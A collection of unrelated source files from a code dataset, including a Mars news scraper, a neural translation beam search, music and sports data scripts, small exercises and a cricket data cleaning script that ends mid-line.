+{"seq_id":"76823873","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 13 10:22:02 2019\n\n@author: zeyuyan\n\"\"\"\n\n# Dependencies\nfrom splinter import Browser\nimport pandas as pd\n\n\n# Initialize the browser\ndef init_browser():\n executable_path = {'executable_path': '/usr/local/bin/chromedriver'}\n return Browser('chrome', **executable_path, headless=False)\n\n# Scrape information\ndef scrape_info():\n final_dict = dict()\n \n browser = init_browser()\n \n \n \"\"\"\n Crawl news website\n \"\"\"\n news_web_url = \"https://mars.nasa.gov/news\"\n \n browser.visit(news_web_url)\n \n news_title = browser.find_by_css('.content_title > a')[0].text\n news_p = browser.find_by_css('.article_teaser_body')[0].text\n \n print(news_title)\n print(news_p)\n print(\"=\" * 20)\n \n final_dict[\"news_title\"] = news_title\n final_dict[\"news_p\"] = news_p\n \n 
\n \"\"\"\n Crawl image website\n \"\"\"\n images_web_url = \"https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars\"\n \n browser.visit(images_web_url)\n \n # Click on the first image\n browser.find_by_css(\".image_and_description_container\")[0].click()\n \n featured_image_url = browser.find_by_css(\".fancybox-image\")[0][\"src\"]\n \n print(featured_image_url)\n print(\"=\" * 20)\n \n final_dict[\"featured_image_url\"] = featured_image_url\n \n \n \"\"\"\n Crawl Mars weather\n \"\"\"\n weather_web_url = \"https://twitter.com/marswxreport?lang=en\"\n \n browser.visit(weather_web_url)\n \n sections = browser.find_by_css(\"p.TweetTextSize.TweetTextSize--normal.js-tweet-text.tweet-text\")\n \n for section in sections:\n if section.text.startswith(\"InSight\"):\n text_to_use = section.text\n break\n \n # Remove \\n\n text_to_use = text_to_use.replace(\"\\n\", \" \")\n \n # Further clean\n text_to_use = text_to_use.replace(\"InSight \", \"\")\n text_to_use = text_to_use.replace(\"sol\", \"Sol\")\n text_to_use = text_to_use.replace(\")\", \"),\")\n \n mars_weather = text_to_use\n \n print(mars_weather)\n print(\"=\" * 20)\n \n final_dict[\"mars_weather\"] = mars_weather\n \n \n \"\"\"\n Crawl Mars facts\n \"\"\"\n facts_web_url = \"https://space-facts.com/mars/\"\n \n tables = pd.read_html(facts_web_url)\n \n df = tables[0]\n \n df.columns = [\"description\", \"value\"]\n df = df.set_index(\"description\")\n \n print(df)\n print(\"=\" * 20)\n \n df.to_html('table.html')\n \n \n \"\"\"\n Crawl Mars hemispheres\n \"\"\"\n hemispheres_web_url = \"https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars\"\n \n browser.visit(hemispheres_web_url)\n \n elements = browser.find_by_css(\"img.thumb\")\n \n hemisphere_image_urls = []\n \n for i in range(len(elements)):\n store_dict = dict()\n browser.find_by_css(\"img.thumb\")[i].click()\n title = browser.find_by_css(\"div.content h2.title\").text\n title = title.replace(\" Enhanced\", \"\")\n img_url = browser.find_by_css(\"div.downloads li a\")[0][\"href\"]\n store_dict[\"title\"] = title\n store_dict[\"img_url\"] = img_url\n hemisphere_image_urls.append(store_dict)\n browser.back()\n \n print(hemisphere_image_urls)\n print(\"=\" * 20)\n \n final_dict[\"hemisphere_image_urls\"] = hemisphere_image_urls\n \n # Close the browser after scraping\n browser.quit()\n \n return final_dict\n ","sub_path":"Coursework 10 - Web Scraping and Mongo Homework/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421346387","text":"# coding: utf8\n\nfrom rust.core import business\n\nfrom db.message import models as message_models\n\n\nclass ReadService(business.Service):\n\t\"\"\"\n\t阅读服务\n\t\"\"\"\n\tdef read(self, messages):\n\t\t\"\"\"\n\t\t阅读\n\t\t\"\"\"\n\t\tmessage_ids = []\n\t\tfor message in messages:\n\t\t\tmessage_ids.append(message.id)\n\n\t\tmessage_models.Message.update(\n\t\t\ttag = message_models.TAG['OLD']\n\t\t).dj_where(id__in=message_ids).execute()\n","sub_path":"business/message/read_service.py","file_name":"read_service.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"280175707","text":"import onmt\nimport onmt.modules\nimport torch.nn as nn\nimport torch\nfrom torch.autograd import Variable\n\n\n# A class for translating during validation\n# Not for effectively loading model and 
translate\nclass InplaceTranslator(object):\n \n def __init__(self, model, dicts, beam_size=1, cuda=True):\n \n self.model = model\n self.dicts = dicts\n self.beam_size = beam_size\n self.cuda = cuda\n self.n_best = beam_size\n \n self.max_sent_length = 100\n \n self.tt = torch.cuda if self.cuda else torch\n \n \n def switchPair(sid, setIDs):\n self.model.switchLangID(setIDs[sid][0], setIDs[sid][1])\n self.model.switchPairID(sid)\n\n\n def _getBatchSize(self, batch):\n \n return batch.size(1)\n \n def translateBatch(self, srcBatch):\n # Batch size is in different location depending on data.\n beamSize = self.beam_size\n\n # (1) run the encoders on the src\n \n states, context = self.model.encoder(srcBatch)\n\n # reshape the states\n encStates = (self.model._fix_enc_hidden(states[0]),\n self.model._fix_enc_hidden(states[1]))\n\n # Drop the lengths needed for encoder.\n srcBatch = srcBatch[0]\n batchSize = self._getBatchSize(srcBatch)\n\n rnnSize = context.size(2)\n \n #~ decoder = self.model.decoder\n #~ attentionLayer = decoder.attn.current()\n useMasking = ( batchSize > 1 )\n\n # This mask is applied to the attention model inside the decoder\n # so that the attention ignores source padding\n padMask = None\n if useMasking:\n padMask = srcBatch.data.eq(onmt.Constants.PAD).t()\n\n def mask(padMask):\n if useMasking:\n #~ attentionLayer.applyMask(padMask)\n self.model.decoder.attn.current().applyMask(padMask)\n\n # (2) run the decoder to generate sentences, using beam search\n\n # Expand tensors for each beam.\n \n context = Variable(context.data.repeat(1, beamSize, 1))\n \n decStates = (Variable(encStates[0].data.repeat(1, beamSize, 1)),\n Variable(encStates[1].data.repeat(1, beamSize, 1)))\n \n\n \n # Initialize the beams\n # Each beam is an object containing the translation status for each sentence in the batch\n beam = [onmt.Beam(beamSize, self.cuda) for k in range(batchSize)]\n \n # Here we prepare the decoder output (zeroes)\n # For input feeding\n decOuts = self.model.make_init_decoder_output(context)\n \n\n if useMasking:\n padMask = srcBatch.data.eq(\n onmt.Constants.PAD).t() \\\n .unsqueeze(0) \\\n .repeat(beamSize, 1, 1)\n\n batchIdx = list(range(batchSize))\n remainingSents = batchSize\n for i in range(self.max_sent_length):\n mask(padMask)\n # Prepare decoder input.\n input = torch.stack([b.getCurrentState() for b in beam\n if not b.done]).t().contiguous().view(1, -1)\n #~ \n #~ print(context.size())\n #~ \n #~ print(decOuts.size())\n \n # compute new decoder output (distribution)\n decOuts, decStates, attn = self.model.decoder(\n Variable(input, volatile=True), decStates, context, decOuts)\n \n # decOut: 1 x (beam*batch) x numWords\n decOuts = decOuts.squeeze(0) \n out = self.model.generator.forward(decOuts)\n \n \n\n # batch x beam x numWords\n wordLk = out.view(beamSize, remainingSents, -1) \\\n .transpose(0, 1).contiguous()\n attn = attn.view(beamSize, remainingSents, -1) \\\n .transpose(0, 1).contiguous()\n\n active = []\n for b in range(batchSize):\n if beam[b].done:\n continue\n\n idx = batchIdx[b]\n if not beam[b].advance(wordLk.data[idx], attn.data[idx]):\n active += [b]\n \n for decState in decStates: # iterate over h, c\n # layers x beam*sent x dim\n sentStates = decState.view(-1, beamSize,\n remainingSents,\n decState.size(2))[:, :, idx]\n sentStates.data.copy_(\n sentStates.data.index_select(\n 1, beam[b].getCurrentOrigin()))\n\n if not active:\n break\n\n # in this section, the sentences that are still active are\n # compacted so that the decoder is not run on 
completed sentences\n activeIdx = self.tt.LongTensor([batchIdx[k] for k in active])\n batchIdx = {beam: idx for idx, beam in enumerate(active)}\n\n def updateActive(t, size):\n # select only the remaining active sentences\n view = t.data.view(-1, remainingSents, size)\n newSize = list(t.size())\n newSize[-2] = newSize[-2] * len(activeIdx) // remainingSents\n return Variable(view.index_select(1, activeIdx)\n .view(*newSize), volatile=True)\n \n decStates = (updateActive(decStates[0], rnnSize),\n updateActive(decStates[1], rnnSize))\n decOuts = updateActive(decOuts, rnnSize)\n context = updateActive(context, rnnSize)\n if useMasking:\n padMask = padMask.index_select(1, activeIdx)\n\n remainingSents = len(active)\n\n # (4) package everything up\n allHyp, allScores, allAttn = [], [], []\n n_best = self.n_best\n\n for b in range(batchSize):\n scores, ks = beam[b].sortBest()\n\n allScores += [scores[:n_best]]\n hyps, attn = zip(*[beam[b].getHyp(k) for k in ks[:n_best]])\n allHyp += [hyps]\n if useMasking:\n valid_attn = srcBatch.data[:, b].ne(onmt.Constants.PAD) \\\n .nonzero().squeeze(1)\n attn = [a.index_select(1, valid_attn) for a in attn]\n allAttn += [attn]\n \n if useMasking:\n self.model.decoder.attn.current().applyMask(None)\n\n return allHyp, allScores, allAttn\n\n def translate(self, srcBatch):\n # (1) convert words to indexes\n src = srcBatch\n batchSize = self._getBatchSize(src[0])\n\n # (2) translate\n pred, predScore, attn = self.translateBatch(src)\n\n # (3) convert indexes to words\n predBatch = []\n for b in range(batchSize):\n # only take the top of the beam search - for simplicity\n predBatch.append(pred[b][0])\n\n return predBatch\n","sub_path":"onmt/InplaceTranslator.py","file_name":"InplaceTranslator.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"245812115","text":"\"\"\"\n library.py\n Nicholas S. 
Bradford\n April 2016\n\n Contains relevant markers for song sections.\n\n\"\"\"\n\nfrom songs import Song, SongComparison\n\n#==================================================================================================\n# Songs\n\n#================================================\nmonster_verses = [\n (0, 14)\n]\nmonster_chorus = [\n (44, 65)\n]\n\n#================================================\ncomplete_monster_verse = [\n (14, 44),\n (65, 89)\n]\ncomplete_monster_chorus = [\n (44, 65),\n (89, 117),\n (138, 173)\n]\n\n#================================================\nhowyouloveme_verses = [\n (8, 38)\n]\nhowyouloveme_chorus = [\n (68, 97)\n]\n\n#================================================\nfeelgood_verses = [\n #(12, 39)\n #(39, 71)\n (39, 52)\n]\nfeelgood_chorus = [\n (71, 84)\n #(71, 100)\n]\n\n#================================================\n# maledictus\nconfutatis_chorus = [\n (1, 17),\n (36, 52)\n # (0, 18),\n # (35, 54)\n]\n# boca me\nconfutatis_verses = [\n (19, 33),\n (55, 89)\n # (18, 34),\n # (54, 90)\n]\n# boca me extra\nconfutatis_bridge = [\n (90, 160)\n]\n\n#================================================\n# soft verse\none_verses = [\n (19, 105),\n (105, 134)\n]\n# metal bridge\none_chorus = [\n #(278, 320)# 4:33 - 5:20,\n (320, 443) #5:20-5:46, 7:23 guitar solo\n]\n\n#================================================\n\nchampions_verses = [\n (1, 24), #23?\n (76, 100) # 110?\n]\nchampions_chorus = [\n (34, 66),\n (110, 174)\n]\n\n#================================================\nremember_verses = [\n (34, 100)\n]\nremember_chorus = [\n (22, 33),\n (101, 111),\n (180, 191)\n]\n\n\n\n#================================================\nentire_confutatis = [(0, 90)]\nentire_monster = [(0, 173)]\n\n\n\n#Here starts TSB's music.\n#================================================\nshame_verses = [\n (4, 17),\n (50,67)\n]\nshame_chorus = [\n (33, 49),\n (83, 99)\n]\n#================================================\nday_verses = [\n (2, 47),\n (64,95)\n]\nday_chorus = [\n (48,63 ),\n (96,110 )\n]\n\n#================================================\nfathertime_verses = [\n (2,40 ),\n (59,87)\n]\nfathertime_chorus = [\n (41, 58),\n (143,180)\n]\n\n#================================================\nyou_verses = [\n (2,43 ),\n (61,93)\n]\nyou_chorus = [\n (44, 60),\n (94,110)\n]\n\n#================================================\nmercy_verses = [\n (2,96 ),\n (129,173)\n]\nmercy_chorus = [\n (97, 128),\n (228, 268)\n]\n\n#================================================\nconformity_verses = [\n (3 ,32),\n (58 ,82)\n]\nconformity_chorus = [\n (33 ,53 ),\n (128, 168)\n]\n\n#==================================================================================================\n# Complete Song data\n\n#TSB's music starts here.\nshame = Song(\"Shame\", 'input/01_Shame.wav',\n verses = shame_verses,\n chorus = shame_chorus)\nday = Song(\"Day\",'input/02_Day.wav',\n verses = day_verses,\n chorus = day_chorus)\nfathertime = Song(\"Father Time\",'input/04_FatherTime.wav',\n verses = fathertime_verses,\n chorus = fathertime_chorus)\nyou = Song(\"You\",'input/05_You.wav',\n verses = you_verses,\n chorus = you_chorus)\nmercy = Song(\"Mercy\",'input/06_Mercy.wav',\n verses = mercy_verses,\n chorus = mercy_chorus)\nconformity = Song(\"conformity\",'input/07_conformity.wav',\n verses = conformity_verses,\n chorus = conformity_chorus)\n\n#NSB's music starts here.\nmonster = Song('Monster', 'input/monster.wav',\n verses=monster_verses,\n chorus=monster_chorus)\nhowyouloveme = 
Song('How You Love Me', 'input/howyouloveme.wav',\n verses=howyouloveme_verses,\n chorus=howyouloveme_chorus)\nfeelgood = Song('Feel Good Inc.', 'input/feelgood.wav',\n verses=feelgood_verses,\n chorus=feelgood_chorus)\nconfutatis = Song('Confutatis Maledictis', 'input/confutatis.wav',\n verses=confutatis_verses,\n chorus=confutatis_chorus)\none = Song('One', 'input/one.wav',\n verses=one_verses,\n chorus=one_chorus)\nchampions = Song('We are the Champions', 'input/champions.wav',\n verses=champions_verses,\n chorus=champions_chorus)\nremember = Song('Remember the Name', 'input/remember.wav',\n verses=remember_verses,\n chorus=remember_chorus)\n\nrock_v_classical = SongComparison(\n name='Monster v Confutatis',\n verses=monster_verses,\n chorus=confutatis_chorus,\n filepath_verses='input/monster.wav',\n filepath_chorus='input/confutatis.wav')\n\npop_v_classical = SongComparison(\n name='HowYouLoveMe v Confutatis',\n verses=howyouloveme_verses,\n chorus=confutatis_chorus,\n filepath_verses='input/howyouloveme.wav',\n filepath_chorus='input/confutatis.wav')\n\npop_v_rock_choruses = SongComparison(\n name='HowYouLoveMe v Monster',\n verses=howyouloveme_chorus,\n chorus=monster_chorus,\n filepath_verses='input/howyouloveme.wav',\n filepath_chorus='input/monster.wav')\n\nrap_v_classical = SongComparison(\n name='RememberTheName v Confutatis',\n verses=remember_verses,\n chorus=confutatis_chorus,\n filepath_verses='input/remember.wav',\n filepath_chorus='input/confutatis.wav')\n\nentire_monster_v_confutatis = SongComparison(\n name='Entire Monster v Confutatis',\n verses=entire_monster,\n chorus=entire_confutatis,\n filepath_verses='input/monster.wav',\n filepath_chorus='input/confutatis.wav')\n","sub_path":"musicml/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"472589107","text":"#This is Bubble sort\r\n'''We would be given an array and we need to sort it\r\n This Algorithm has O(n^2) complexity'''\r\ndef BubbleSort(arr):\r\n n = len(arr)\r\n for i in range(n):\r\n for j in range(n-i-1): #Here we are trying to put the maximum to the last.\r\n if(arr[j]>arr[j+1]):\r\n arr[j],arr[j+1]=arr[j+1],arr[j]\r\n return arr\r\ndef main():\r\n a = list(map(int,input().split()))\r\n print(BubbleSort(a))\r\nif(__name__=='__main__'):\r\n main()\r\n'''So, lets say our array is [4,3,1,5,2]\r\n We keep replacing the element if it is greater than the element on the right side\r\n Eventually we will have\r\n 5 at index 4\r\n the 4 at index 3 and so on.'''\r\n","sub_path":"Sorting Techniques/Bubble Sort.py","file_name":"Bubble Sort.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"102810486","text":"tribe_prompt = True\nwhile tribe_prompt == True:\n tribe = int(input(\"Choose a tribe:\\nSelect 1 for Teutons\\nSelect 2 for Gauls\\nSelect 3 for Romans\\n\"))\n if tribe == 1:\n print(\"Welcome Teuton!\")\n break\n elif tribe == 2:\n print(\"Welcome Gaul!\")\n break\n elif tribe == 3:\n print(\"Welcome Roman!\")\n break\n else:\n print(\"Invalid option.\")\n","sub_path":"vimgame.py","file_name":"vimgame.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"513462074","text":"zdrojovyDokument = open(\"Answers.csv\")\nacc = 0\nv = 0\nprvniRadek = True\njmenoNejstarsiho = \"\"\n\nfor radek in 
zdrojovyDokument:\n if prvniRadek:\n prvniRadek = False\n continue\n jedenFormular = radek.strip(\"\\n\").split(\",\")\n if jedenFormular[2] == \"Yes\":\n acc = acc + 1 + int(jedenFormular[4])\n if int(jedenFormular[3]) > v:\n v = int(jedenFormular[3])\n jmenoNejstarsiho = jedenFormular[1]\n\n\nprint(acc)\nprint(v)\nprint(jmenoNejstarsiho)\n\nzdrojovyDokument.close()\n# parsujeme dokument","sub_path":"Dotaznik.py","file_name":"Dotaznik.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"269462326","text":"from ..open_mysql import OpenMySQL\nimport json\nimport datetime\nimport uuid\n\n\ndef make_l_b_competition_package():\n db = OpenMySQL(db='leisu')\n # ID_DICT = db.select_leisu()\n result = []\n # result = db.select_l_b(table='competition_b')\n DATAS = db.select_b_leisu()\n player_rank = db.select_l_b(table='player_rank')\n team_rank = db.select_l_b(table='team_rank')\n package_list = []\n for competition in result:\n Packages = {}\n CompareHeader = {'SourceItem': 2, 'ColectType': 1, 'PackageType': 0, 'OtherID': '',\n 'OtherName': competition.get('competition_name'), 'CollecSign': False,\n 'CurrentSeason': competition.get('CurrentSeason'), 'OtherSeasonID': competition.get('season_id'),\n }\n ew_rank = json.loads(competition.get('ew_rank'), encoding='utf-8') if competition.get('ew_rank') and competition.get('ew_rank') != 'None' else None\n zone_rank = json.loads(competition.get('zone_rank'), encoding='utf-8') if competition.get('zone_rank') and competition.get('zone_rank') != 'None' else None\n if ew_rank:\n if zone_rank:\n ew_rank += zone_rank\n if competition.get('competition_name') == 'CBA':\n standings = list(map(lambda x: {'title_name': x.get('title_name'), 'scope': x.get('scope'), 'Standing':\n [[rank.get('rank'), rank.get('team_id'), rank.get('team_name'),\n str(int(rank.get('win')) + int(rank.get('los'))), rank.get('win'),\n rank.get('los'), rank.get('win_pro'), rank.get('pre'), rank.get('pre_type'),\n str(abs(float(rank.get('pre')) - float(rank.get('pre_type')))),\n rank.get('win_sub_los').split('-')[0], rank.get('win_sub_los').split('-')[-1],\n rank.get('home').split('-')[0], rank.get('home').split('-')[-1],\n rank.get('score')] for rank in x.get('datas')]}, ew_rank))\n else:\n standings = list(map(lambda x: {'title_name': x.get('title_name'), 'scope': x.get('scope'), 'Standing':\n [[rank.get('rank'), rank.get('team_id'), rank.get('team_name'),\n rank.get('win'), rank.get('los'), rank.get('win_pro'),\n rank.get('win_sub_los'), rank.get('pre_type') .split('-')[0],\n rank.get('pre_type').split('-')[-1],\n rank.get('pre').split('-')[0], rank.get('pre').split('-')[-1],\n rank.get('home').split('-')[0], rank.get('home').split('-')[-1],\n rank.get('away').split('-')[0], rank.get('away').split('-')[-1],\n rank.get('ten').split('-')[0], rank.get('ten').split('-')[-1],\n rank.get('score'), rank.get('points'), str(abs(float(rank.get('score')) - float(rank.get('points')))),\n rank.get('winning_streak')] for rank in x.get('datas')]}, ew_rank))\n # test = json.dumps(standings, ensure_ascii=False)\n Packages['B_CompetitionStanding'] = standings\n package_dumps = {'ID': str(uuid.uuid1()),\n 'CollectTime': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),\n 'CompareHeader': CompareHeader, 'Packages': Packages, }\n package_list.append(package_dumps)\n for competition in [{'competition_id': 1, 'competition_name': 'NBA'}, {'competition_id': 3, 'competition_name': 'CBA'}]:\n Packages = {}\n 
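# --- editor's note (added, not in the original record): the surrounding
# make_l_b_competition_package() builds each outgoing package with the same
# stamping pattern. A minimal sketch of that pattern, using only the uuid and
# datetime modules already imported at the top of this file:
#
#     package = {
#         'ID': str(uuid.uuid1()),  # unique package id
#         'CollectTime': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),
#         'CompareHeader': compare_header,  # header dict built per competition
#         'Packages': packages,             # payload dict built per competition
#     }
#     package_list.append(package)
#
# `compare_header` and `packages` stand in for the dicts assembled below.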
CompareHeader = {'SourceItem': 2, 'ColectType': 1, 'PackageType': 0,\n 'OtherID': competition.get('competition_id'), 'OtherName': competition.get('competition_name'),\n 'CurrentSeason': '2018', 'OtherSeasonID': '2018-2019',\n 'CollecSign': False,\n # 'OtherShortName': country.get('Name') if country else None,\n }\n def dumps_func(x):\n competition_type = {3: 1, 4: 3}\n if x.get('season_id') == 2018 and x.get('competition_name') == competition.get('competition_name'):\n for player in DATAS[3]:\n if competition_type.get(player.get('competition_id')) == competition.get('competition_id'):\n x_name = x.get('player_name').replace('-', '_').replace('·', '_')\n player_name = player.get('player_name').replace('-', '_')\n if x_name in player_name or player_name in x_name:\n # if player.get('team_name') in x.get('team_name') or x.get('team_name') in player.get('team_name'):\n datas = {'PlayerID': {'SourceItem': 1, 'ColectType': 1, 'PackageType': 3,\n 'OtherID': player.get('player_id'), 'OtherName': x.get('player_name'), 'CollecSign': False, },\n 'ScoreAvg': float(x.get('ScoreAvg')) if x.get('ScoreAvg') else None,\n 'BoardsAvg': float(x.get('BoardsAvg')) if x.get('BoardsAvg') else None,\n 'AssistsAvg': float(x.get('AssistsAvg')) if x.get('AssistsAvg') else None,\n 'BlocksAvg': float(x.get('BlocksAvg')) if x.get('BlocksAvg') else None,\n 'StealsAvg': float(x.get('StealsAvg')) if x.get('StealsAvg') else None, }\n return datas\n # else:\n # print(x.get('player_name'), x.get('team_name'))\n # # print(player.get('player_name'), player.get('team_name'))\n # print()\n player = list(filter(lambda f: f, map(lambda x: dumps_func(x), player_rank)))\n team = list(filter(lambda f: f, map(lambda x: {'TeamId': {'SourceItem': 2, 'ColectType': 1, 'PackageType': 2,\n 'OtherID': DATAS[2].get(x.get('team_name')), 'OtherName': x.get('team_name'),\n 'CollecSign': False, },\n 'ScoreAvg': float(x.get('ScoreAvg')) if x.get('ScoreAvg') else None,\n 'BoardsAvg': float(x.get('BoardsAvg')) if x.get('BoardsAvg') else None,\n 'AssistsAvg': float(x.get('AssistsAvg')) if x.get('AssistsAvg') else None,\n 'BlocksAvg': float(x.get('BlocksAvg')) if x.get('BlocksAvg') else None,\n 'StealsAvg':float(x.get('StealsAvg')) if x.get('StealsAvg') else None,\n 'ShootRate': float(x.get('ShootRate').replace('%', '') if x.get('ShootRate').endswith('%') else x.get('ShootRate')) / 100 if x.get('ShootRate') else None,\n 'ThreeShootRate': float(x.get('ThreeShootRate').replace('%', '') if x.get('ThreeShootRate').endswith('%') else x.get('ThreeShootRate')) / 100 if x.get('ThreeShootRate') else None,\n 'FreeThrowsRate': float(x.get('FreeThrowsRate').replace('%', '') if x.get('FreeThrowsRate').endswith('%') else x.get('FreeThrowsRate')) / 100 if x.get('FreeThrowsRate') else None}\n if x.get('season_id') == 2018 and x.get('competition_name') == competition.get('competition_name') else None, team_rank)))\n B_CompetitionYeamPlayerSkill = {'team': team, 'player': player}\n Packages['B_CompetitionYeamPlayerSkill'] = B_CompetitionYeamPlayerSkill\n package_dumps = {'ID': str(uuid.uuid1()),\n 'CollectTime': datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%S'),\n 'CompareHeader': CompareHeader, 'Packages': Packages, }\n package_list.append(package_dumps)\n return package_list","sub_path":"scrapy_7m/tool/make_package_tool/l_b_make_package.py","file_name":"l_b_make_package.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"3371205","text":"import re\n\ndef 
sentence_segmentation(line):\n    seg_list = []\n#    for line in text :\n#        seg_list = []\n    sentence = re.findall(r'([A-Z].*?[\\.;:\\?]\\s)', line)\n    if sentence:\n        seg_list = sentence\n        #print(sentence)\n    return seg_list\n    \nif __name__ == '__main__':\n    with open('nlp.txt') as text:\n        for line in text:\n            sentence_list = sentence_segmentation(line)\n            if sentence_list:\n                for sentence in sentence_list:\n                    print(sentence, end = '\\n')\n\n\n\n","sub_path":"arai/chapter06/knock50.py","file_name":"knock50.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"645606706","text":"#!/usr/bin/env python3\n\"\"\"\n# Project Euler Problem 4\n## Largest Palindrome Product\n\nA palindromic number reads the same both ways. The largest palindrome made from\nthe product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit numbers.\n\"\"\"\n\nfrom itertools import combinations, starmap\nimport operator\n\ndef rev(s):\n    \"\"\"\n    Reverse a string.\n    \"\"\"\n    # Leaving start and end blank and setting step to -1 in slice notation\n    # reverses a string\n    return s[::-1]\n\ndef is_palindromic(n):\n    \"\"\"\n    Checks whether an integer is palindromic or not.\n    \"\"\"\n    if type(n) is not int:\n        raise TypeError('n must be an integer')\n    \n    n_str = str(n)\n\n    # 1 digit is always palindromic\n    if len(n_str) == 1:\n        return True\n\n    str_len = len(n_str)\n    if (str_len % 2) == 0:\n        # Even length numbers are palindromic if the digits on the left half of the\n        # number are the same as the right half digits reversed.\n        split_idx = str_len // 2\n        if n_str[:split_idx] == rev(n_str[split_idx:]):\n            return True\n        else:\n            return False\n    else:\n        # The check for odd length numbers is almost the same except the middle\n        # digit is ignored when creating the two halves.\n        split_idx_l = str_len // 2\n        split_idx_r = split_idx_l + 1\n        if n_str[:split_idx_l] == rev(n_str[split_idx_r:]):\n            return True\n        else:\n            return False\n\ndef main():\n    products = starmap(operator.mul, combinations(range(100,1000), 2))\n    palindromic_products = filter(is_palindromic, products)\n    max_palindromic_product = max(palindromic_products)\n    print('Largest palindromic product of two three digit integers is {0}'.format(max_palindromic_product))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"src/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"42185866","text":"from simple_zpl2 import ZPLDocument, QR_Barcode, NetworkPrinter\n\n\nzpl = ZPLDocument()\nprinter = NetworkPrinter('192.168.49.43') # CHANGE TO YOUR PRINTER IP\n\nzpl.add_comment('Create a QR Code')\nzpl.add_field_origin(20, 20)\nqr_data = 'This is data inside a QR code. 
This is a barcode often read by cell phones.'\nqr = QR_Barcode(qr_data, 2, 2, zpl._QR_ERROR_CORRECTION_STANDARD)\nzpl.add_barcode(qr)\n\nzpl.add_comment('Now some text')\nzpl.add_field_origin(200, 20)\nzpl.add_font('C', zpl._ORIENTATION_NORMAL, 15)\nzpl.add_field_data('Text on Label')\n\n# Print generated text\nprinter.print_zpl(zpl)\n","sub_path":"examples/printing.py","file_name":"printing.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"101212021","text":"# %%\r\nimport pandas\r\nimport re\r\nimport os\r\nfrom datetime import datetime\r\n\r\n# %%\r\ndf = pandas.read_csv('files/matches.txt', '|')\r\ndg = pandas.read_csv('files/grounds.txt', '|')\r\ndr = pandas.read_csv('files/ICC_ODI.csv', ',')\r\n\r\n# %%\r\ndf = df[df['RESULT'] != 'No result']\r\ndf = df[df['RESULT'] != 'Match abandoned']\r\ndf = df[df['RESULT'] != 'Match cancelled']\r\ndf = df[~(df['RESULT'].str.contains('conceded'))]\r\ndf = df[~(df['RESULT'].str.endswith('won by default'))]\r\ndf = df[~(df['RESULT'].str.endswith('won by walkover'))]\r\n\r\n# %%\r\nddg = dict(tuple(dg.groupby(['GROUND'])))\r\n\r\n# %%\r\nfor row in dr.itertuples():\r\n dr.at[row.Index, 'Match_Date'] = datetime.strptime(row.Match_Date, '%d%b%Y').strftime('%Y-%m-%d')\r\n c1 = row.Team1\r\n c2 = row.Team2\r\n if 'run' in str(row.Margin):\r\n dg.at[row.Index, 'Team1'] = row.Winner\r\n dg.at[row.Index, 'Team2'] = c1 if row.Winner == c2 else c2\r\n if 'wicket' in str(row.Margin):\r\n dg.at[row.Index, 'Team2'] = row.Winner\r\n dg.at[row.Index, 'Team1'] = c1 if row.Winner == c2 else c2\r\n\r\n# %%\r\ndr = dr.reindex(columns = ['Match_Date', 'Team1', 'Team2', 'Ground', 'Team1_rank', 'Team2_rank'])\r\n\r\nddr = dict(tuple(dr.groupby(['Match_Date', 'Team1', 'Team2'])))\r\n\r\n# %%\r\ncompiled = re.compile(r'(.*)/(.*)/(.*)')\r\n\r\nfor row in df.itertuples():\r\n df.at[row.Index, 'DATE'] = compiled.sub(r'\\3-\\2-\\1', row.DATE)\r\n \r\n countries = row.COUNTRIES.split('v.')\r\n c1 = countries[0].strip()\r\n c2 = countries[1].strip()\r\n \r\n if row.RESULT == 'Match Tied':\r\n winner = None\r\n margin = 'Tied'\r\n else:\r\n results = row.RESULT.split(' won by ')\r\n winner = results[0].strip()\r\n margin = results[1].strip()\r\n df.at[row.Index, 'WINNER'] = winner\r\n df.at[row.Index, 'MARGIN'] = margin\r\n if 'run' in margin or 'urns' in margin or '114' in margin:\r\n df.at[row.Index, 'TEAM.1'] = winner\r\n df.at[row.Index, 'TEAM.2'] = c1 if winner == c2 else c2\r\n elif 'wicket' in margin or 'wiciket' in margin:\r\n df.at[row.Index, 'TEAM.2'] = winner\r\n df.at[row.Index, 'TEAM.1'] = c1 if winner == c2 else c2\r\n else:\r\n print('error margin ', margin)\r\n df.at[row.Index, 'TEAM.1'] = c1\r\n df.at[row.Index, 'TEAM.2'] = c2\r\n \r\n df.at[row.Index, 'CITY'] = ddg[row.GROUND].iloc[0]['CITY']\r\n df.at[row.Index, 'COUNTRY'] = ddg[row.GROUND].iloc[0]['COUNTRY']\r\n \r\n key = 